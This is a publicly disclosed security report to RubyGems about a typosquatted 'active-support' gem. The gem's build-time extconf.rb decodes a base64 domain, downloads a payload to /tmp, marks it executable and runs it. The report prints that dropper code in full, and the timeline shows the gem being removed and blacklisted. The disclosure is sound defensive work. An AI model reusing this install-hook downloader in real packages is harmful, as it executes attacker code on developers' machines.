Malware in `active-support` gem
State Resolved (Closed)
Disclosed publicly 2018-08-09T18:14:31.969Z
Reported To
Weakness Command Injection - Generic
Bounty
Collapse


Timeline
submitted a report to RubyGems .
2018-08-09T09:02:38.599Z

This was sent to RubySec:

The gem duplicates official activesupport (no hyphen) code, but adds a compiled extension. The extension attempts to resolve a base64 encoded domain (29faea63.planfhntage.de), downloads a payload, and executes.

active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb

require 'net/http'
require 'uri'
require 'base64'
require 'resolv'

class Smectis
  def self.install_explot(weighership)
    if !weighership.nil? and weighership != '0.0.0.0'
      educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))
      File.open('/tmp/autosymbiontic', 'wb+') do |uterometer|
        uterometer.binmode
        uterometer.write(educable.body)
        uterometer.chmod(0777)
        uterometer.close
      end
      system('/tmp/autosymbiontic')
    end
  end

  def self.run()
    milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='
    jaunting = nil
    begin
      jaunting = Resolv.getaddress(Base64.decode64(milligram))
    rescue
    end
    self.install_exploit(jaunting)
  end
end

Smectis.run()

Impact

Run arbitrary code on a victim's machine.

Regards,
Frans

Activities::Comment
2018-08-09T09:02:39.081Z
Thanks for submitting this report to RubyGems. Our team will review and investigate the issue. Please note that only issues in the rubygems library are eligible for our bug bounty program.


dwradcliffe Activities::BugTriaged
2018-08-09T13:01:59.028Z
Thanks @reed, ack. Working on this now.


dwradcliffe Activities::BugResolved
2018-08-09T13:12:13.727Z
We have removed the malicious gem and taken steps to prevent further malicious actions.


Activities::NotEligibleForBounty
2018-08-09T13:12:23.315Z


reed Activities::AgreedOnGoingPublic
2018-08-09T17:54:59.032Z
Blacklisted in https://github.com/rubygems/rubygems.org/pull/1762 Requesting disclosure.


dwradcliffe Activities::AgreedOnGoingPublic
2018-08-09T18:14:31.914Z


dwradcliffe Activities::ReportBecamePublic
2018-08-09T18:14:32.004Z